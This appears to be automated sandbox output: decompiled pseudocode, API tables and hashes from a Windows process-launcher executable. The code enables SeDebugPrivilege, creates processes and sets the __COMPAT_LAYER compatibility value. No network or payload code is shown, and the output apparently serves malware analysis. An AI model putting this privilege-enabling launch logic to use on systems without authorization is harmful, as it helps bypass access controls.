                                                                                                                                                                                                                          												if(__eflags != 0) {
                                                                                                                                                                                                                          													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                          												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                                                                                                                                                          												_t207 = _v28;
                                                                                                                                                                                                                          												__eflags = _t207;
                                                                                                                                                                                                                          												_v16 = 0x40c4e8;
                                                                                                                                                                                                                          												if(_t207 != 0) {
                                                                                                                                                                                                                          													_v16 = _t207;
                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                          												_v12 = _v12 | 0x00000400;
                                                                                                                                                                                                                          												E004054B9( &_v228);
                                                                                                                                                                                                                          												E004054B9( &_v92);
                                                                                                                                                                                                                          												_t286 = 0;
                                                                                                                                                                                                                          												__eflags = 0;
                                                                                                                                                                                                                          												L58:
                                                                                                                                                                                                                          												_t315 = _a8;
                                                                                                                                                                                                                          												_t311 = _a4;
                                                                                                                                                                                                                          												goto L63;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          											E00405497( &_v92);
                                                                                                                                                                                                                          											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                                                                                                                                                          											_t359 =  *_t311 - _t286;
                                                                                                                                                                                                                          											if( *_t311 != _t286) {
                                                                                                                                                                                                                          												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                                                                                                                                                          											_t219 = _v28;
                                                                                                                                                                                                                          											_v16 = 0x40c4e8;
                                                                                                                                                                                                                          											if(_t219 != _t286) {
                                                                                                                                                                                                                          												_v16 = _t219;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          											_v12 = _v12 | 0x00000400;
                                                                                                                                                                                                                          											E004054B9( &_v92);
                                                                                                                                                                                                                          											goto L58;
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										_push(L"HIGHDPIAWARE");
                                                                                                                                                                                                                          										L45:
                                                                                                                                                                                                                          										E00401D1E(_t311);
                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									_push(L"DISABLEDWM");
                                                                                                                                                                                                                          									goto L45;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_push(L"DISABLETHEMES");
                                                                                                                                                                                                                          								goto L45;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_push(L"640X480");
                                                                                                                                                                                                                          							goto L45;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                          					_v20 =  &_v1316;
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          0x004025da
                                                                                                                                                                                                                          0x004025e3
                                                                                                                                                                                                                          0x004025eb
                                                                                                                                                                                                                          0x00402633
                                                                                                                                                                                                                          0x004025fb
                                                                                                                                                                                                                          0x00402608
                                                                                                                                                                                                                          0x0040260f
                                                                                                                                                                                                                          0x00402614
                                                                                                                                                                                                                          0x00402624
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x0040263a
                                                                                                                                                                                                                          0x0040263b
                                                                                                                                                                                                                          0x00402646
                                                                                                                                                                                                                          0x0040264b
                                                                                                                                                                                                                          0x0040264c
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265d
                                                                                                                                                                                                                          0x00402666
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402672
                                                                                                                                                                                                                          0x00402675
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x00402683
                                                                                                                                                                                                                          0x0040268b
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x004026a3
                                                                                                                                                                                                                          0x004026ac
                                                                                                                                                                                                                          0x004026b5
                                                                                                                                                                                                                          0x004026b8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ba
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026bf
                                                                                                                                                                                                                          0x004026c1
                                                                                                                                                                                                                          0x004026c6
                                                                                                                                                                                                                          0x004026cc
                                                                                                                                                                                                                          0x004026d5
                                                                                                                                                                                                                          0x004026db
                                                                                                                                                                                                                          0x004026e4
                                                                                                                                                                                                                          0x004026ea
                                                                                                                                                                                                                          0x004026f3
                                                                                                                                                                                                                          0x004026f9
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x0040270d
                                                                                                                                                                                                                          0x00402710
                                                                                                                                                                                                                          0x0040276d
                                                                                                                                                                                                                          0x00402770
                                                                                                                                                                                                                          0x0040280b
                                                                                                                                                                                                                          0x0040280e
                                                                                                                                                                                                                          0x00402813
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402819
                                                                                                                                                                                                                          0x0040281f
                                                                                                                                                                                                                          0x00402836
                                                                                                                                                                                                                          0x00402841
                                                                                                                                                                                                                          0x00402846
                                                                                                                                                                                                                          0x0040284a
                                                                                                                                                                                                                          0x00402851
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402860
                                                                                                                                                                                                                          0x00402865
                                                                                                                                                                                                                          0x00402876
                                                                                                                                                                                                                          0x00402879
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402891
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x00402779
                                                                                                                                                                                                                          0x00402784
                                                                                                                                                                                                                          0x0040278d
                                                                                                                                                                                                                          0x004027a4
                                                                                                                                                                                                                          0x004027b3
                                                                                                                                                                                                                          0x004027b8
                                                                                                                                                                                                                          0x004027bb
                                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027d1
                                                                                                                                                                                                                          0x004027d6
                                                                                                                                                                                                                          0x004027d9
                                                                                                                                                                                                                          0x004027db
                                                                                                                                                                                                                          0x004027e2
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e7
                                                                                                                                                                                                                          0x004027f4
                                                                                                                                                                                                                          0x004027fc
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00402715
                                                                                                                                                                                                                          0x00402729
                                                                                                                                                                                                                          0x0040272e
                                                                                                                                                                                                                          0x00402731
                                                                                                                                                                                                                          0x00402738
                                                                                                                                                                                                                          0x00402738
                                                                                                                                                                                                                          0x00402743
                                                                                                                                                                                                                          0x00402748
                                                                                                                                                                                                                          0x0040274d
                                                                                                                                                                                                                          0x00402754
                                                                                                                                                                                                                          0x00402756
                                                                                                                                                                                                                          0x00402756
                                                                                                                                                                                                                          0x00402759
                                                                                                                                                                                                                          0x00402763
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402300
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040233E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402356
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402387
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004023B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004023D9
                                                                                                                                                                                                                          • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040242B
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024BE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024D1
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00402519
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 0040252B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402561
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402574
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025BC
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025CE
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004025F0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040260F
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                                                                                                                          • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                                                                                                                          • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                                                                                                                          • API String ID: 2452314994-435178042
                                                                                                                                                                                                                          • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                                                                          • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                                                                                                                                          				char _v0;
                                                                                                                                                                                                                          				WCHAR* _v4;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                          				wchar_t* _t85;
                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                                          				intOrPtr _t92;
                                                                                                                                                                                                                          				wchar_t* _t93;
                                                                                                                                                                                                                          				intOrPtr _t95;
                                                                                                                                                                                                                          				int _t106;
                                                                                                                                                                                                                          				char* _t110;
                                                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                                                          				wchar_t* _t117;
                                                                                                                                                                                                                          				intOrPtr _t124;
                                                                                                                                                                                                                          				wchar_t* _t125;
                                                                                                                                                                                                                          				intOrPtr _t131;
                                                                                                                                                                                                                          				wchar_t* _t132;
                                                                                                                                                                                                                          				int _t156;
                                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                                          				intOrPtr _t162;
                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                          				void* _t178;
                                                                                                                                                                                                                          				void* _t179;
                                                                                                                                                                                                                          				intOrPtr _t181;
                                                                                                                                                                                                                          				int _t187;
                                                                                                                                                                                                                          				intOrPtr _t188;
                                                                                                                                                                                                                          				intOrPtr _t190;
                                                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                                                          				signed int _t205;
                                                                                                                                                                                                                          				signed int _t206;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t179 = __edx;
                                                                                                                                                                                                                          				_t158 = __ecx;
                                                                                                                                                                                                                          				_t206 = _t205 & 0xfffffff8;
                                                                                                                                                                                                                          				E0040B550(0x1ccc, __ecx);
                                                                                                                                                                                                                          				_t76 = E0040313D(_t158);
                                                                                                                                                                                                                          				if(_t76 != 0) {
                                                                                                                                                                                                                          					E0040AC52();
                                                                                                                                                                                                                          					SetErrorMode(0x8001); // executed
                                                                                                                                                                                                                          					_t156 = 0;
                                                                                                                                                                                                                          					 *0x40fa70 = 0x11223344;
                                                                                                                                                                                                                          					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                                                                                                                                          					_t82 = E00405497( &_a8);
                                                                                                                                                                                                                          					_a48 = 0x20;
                                                                                                                                                                                                                          					_a40 = 0;
                                                                                                                                                                                                                          					_a52 = 0;
                                                                                                                                                                                                                          					_a44 = 0;
                                                                                                                                                                                                                          					_a56 = 0;
                                                                                                                                                                                                                          					E004056B5(_t158, __eflags, _t82, _a12);
                                                                                                                                                                                                                          					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                                                                                                                                          					 *_t206 = L"/SpecialRun";
                                                                                                                                                                                                                          					_t85 = E0040585C( &_v0);
                                                                                                                                                                                                                          					__eflags = _t85;
                                                                                                                                                                                                                          					if(_t85 != 0) {
                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                          						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                                                                                                                                          						__eflags = _t86 - _t156;
                                                                                                                                                                                                                          						if(_t86 < _t156) {
                                                                                                                                                                                                                          							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                                                                                                                                          							__eflags = _t87 - _t156;
                                                                                                                                                                                                                          							if(_t87 >= _t156) {
                                                                                                                                                                                                                          								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          								_t41 = _t87 + 1; // 0x1
                                                                                                                                                                                                                          								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                                                                                                                                          								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                                                                                                                                          								__eflags = _t117;
                                                                                                                                                                                                                          								if(_t117 == 0) {
                                                                                                                                                                                                                          									_a92 = _t156;
                                                                                                                                                                                                                          									memset( &_a94, _t156, 0x208);
                                                                                                                                                                                                                          									_a620 = _t156;
                                                                                                                                                                                                                          									memset( &_a622, _t156, 0x208);
                                                                                                                                                                                                                          									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                                                                                                                                          									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									_t125 = _t124 + 0x5504;
                                                                                                                                                                                                                          									_v4 = _t125;
                                                                                                                                                                                                                          									_t187 = wcslen(_t125);
                                                                                                                                                                                                                          									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                                                                                                                                          									__eflags = _t187 + _t51 - 0x104;
                                                                                                                                                                                                                          									if(_t187 + _t51 >= 0x104) {
                                                                                                                                                                                                                          										_a620 = _t156;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									_t132 = _t131 + 0x5504;
                                                                                                                                                                                                                          									__eflags = _t132;
                                                                                                                                                                                                                          									wcscpy(_t132,  &_a620);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							E00402F31(_t156);
                                                                                                                                                                                                                          							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          							_pop(_t159);
                                                                                                                                                                                                                          							_a84 =  &_a8;
                                                                                                                                                                                                                          							_a76 = 0x40cb0c;
                                                                                                                                                                                                                          							_a88 = _t156;
                                                                                                                                                                                                                          							_a80 = _t156;
                                                                                                                                                                                                                          							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                                                                                                                                          							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                                                                                                                                          							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                                                                                                                                          								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                                                                                                                                          								__eflags = _t93;
                                                                                                                                                                                                                          								if(_t93 < 0) {
                                                                                                                                                                                                                          									E00406420();
                                                                                                                                                                                                                          									__imp__CoInitialize(_t156);
                                                                                                                                                                                                                          									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                                                                                                                                          									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                                                                                                                                          									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                                                                                                                                          									E00402F31(1);
                                                                                                                                                                                                                          									__imp__CoUninitialize();
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									E004065BE(_t159);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                                                                                                                                          								_a7356 = _t156;
                                                                                                                                                                                                                          								_a7352 = _t156;
                                                                                                                                                                                                                          								_a7340 = _t156;
                                                                                                                                                                                                                          								_a7344 = _t156;
                                                                                                                                                                                                                          								_a7348 = _t156;
                                                                                                                                                                                                                          								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                                                                                                                                          								_t110 =  &_a5288;
                                                                                                                                                                                                                          								L6:
                                                                                                                                                                                                                          								E004035FB(_t110);
                                                                                                                                                                                                                          								L7:
                                                                                                                                                                                                                          								E004054B9( &_v0);
                                                                                                                                                                                                                          								E004099D4( &_a32);
                                                                                                                                                                                                                          								E004054B9( &_v0);
                                                                                                                                                                                                                          								_t106 = _t156;
                                                                                                                                                                                                                          								goto L2;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t26 = _t86 + 1; // 0x1
                                                                                                                                                                                                                          						_t173 = _t26;
                                                                                                                                                                                                                          						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                          							E00402F31(_t156);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							E00402FC6(_t173, __eflags, _t138);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          						_a68 =  &_a8;
                                                                                                                                                                                                                          						_a60 = 0x40cb0c;
                                                                                                                                                                                                                          						_a72 = _t156;
                                                                                                                                                                                                                          						_a64 = _t156;
                                                                                                                                                                                                                          						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                                                                                                                                          						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          						_a5280 = _t156;
                                                                                                                                                                                                                          						_a5276 = _t156;
                                                                                                                                                                                                                          						_a5264 = _t156;
                                                                                                                                                                                                                          						_a5268 = _t156;
                                                                                                                                                                                                                          						_a5272 = _t156;
                                                                                                                                                                                                                          						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                                                                                                                                          						_t110 =  &_a3212;
                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					__eflags = _a56 - 3;
                                                                                                                                                                                                                          					if(_a56 != 3) {
                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					__eflags = 1;
                                                                                                                                                                                                                          					_a3212 = 0;
                                                                                                                                                                                                                          					_a3208 = 0;
                                                                                                                                                                                                                          					_a3196 = 0;
                                                                                                                                                                                                                          					_a3200 = 0;
                                                                                                                                                                                                                          					_a3204 = 0;
                                                                                                                                                                                                                          					_v4 = 0;
                                                                                                                                                                                                                          					_v0 = 0;
                                                                                                                                                                                                                          					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                                                                                                                                          					_t177 = 2;
                                                                                                                                                                                                                          					_push(E0040584C( &_v0, _t177));
                                                                                                                                                                                                                          					L0040B1F8();
                                                                                                                                                                                                                          					_pop(_t178);
                                                                                                                                                                                                                          					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
                                                                                                                                                                                                                          					_t110 =  &_a1132;
                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t106 = _t76 + 1;
                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                          					return _t106;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}





































                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                                                                            • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                                                                            • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                                                                            • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
                                                                                                                                                                                                                          • swscanf.MSVCRT ref: 00408620
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00408633
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                                                                                                                          • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                                                                                                                          • API String ID: 3933224404-3784219877
                                                                                                                                                                                                                          • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                                                                                                                          • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                          				wchar_t* _v16;
                                                                                                                                                                                                                          				void _v546;
                                                                                                                                                                                                                          				long _v548;
                                                                                                                                                                                                                          				void _v1074;
                                                                                                                                                                                                                          				char _v1076;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				long _t84;
                                                                                                                                                                                                                          				int _t87;
                                                                                                                                                                                                                          				wchar_t* _t88;
                                                                                                                                                                                                                          				int _t92;
                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                          				int _t94;
                                                                                                                                                                                                                          				int _t96;
                                                                                                                                                                                                                          				int _t99;
                                                                                                                                                                                                                          				int _t104;
                                                                                                                                                                                                                          				long _t105;
                                                                                                                                                                                                                          				int _t110;
                                                                                                                                                                                                                          				void** _t112;
                                                                                                                                                                                                                          				int _t113;
                                                                                                                                                                                                                          				intOrPtr _t131;
                                                                                                                                                                                                                          				wchar_t* _t132;
                                                                                                                                                                                                                          				int* _t148;
                                                                                                                                                                                                                          				wchar_t* _t149;
                                                                                                                                                                                                                          				int _t151;
                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                          				int _t154;
                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                          				long _t160;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t145 = __edx;
                                                                                                                                                                                                                          				_t152 = __ecx;
                                                                                                                                                                                                                          				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				if(_t131 != 4) {
                                                                                                                                                                                                                          					__eflags = _t131 - 5;
                                                                                                                                                                                                                          					if(_t131 != 5) {
                                                                                                                                                                                                                          						__eflags = _t131 - 9;
                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                          							__eflags = _t131 - 8;
                                                                                                                                                                                                                          							if(_t131 != 8) {
                                                                                                                                                                                                                          								__eflags = _t131 - 6;
                                                                                                                                                                                                                          								if(_t131 != 6) {
                                                                                                                                                                                                                          									__eflags = _t131 - 7;
                                                                                                                                                                                                                          									if(_t131 != 7) {
                                                                                                                                                                                                                          										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_t132 = __eax + 0x46b6;
                                                                                                                                                                                                                          										_t148 = __eax + 0x48b6;
                                                                                                                                                                                                                          										__eflags =  *_t148;
                                                                                                                                                                                                                          										_v16 = _t132;
                                                                                                                                                                                                                          										_v8 = __eax + 0x4ab6;
                                                                                                                                                                                                                          										if( *_t148 == 0) {
                                                                                                                                                                                                                          											_t88 = wcschr(_t132, 0x40);
                                                                                                                                                                                                                          											__eflags = _t88;
                                                                                                                                                                                                                          											if(_t88 != 0) {
                                                                                                                                                                                                                          												_t148 = 0;
                                                                                                                                                                                                                          												__eflags = 0;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          										}
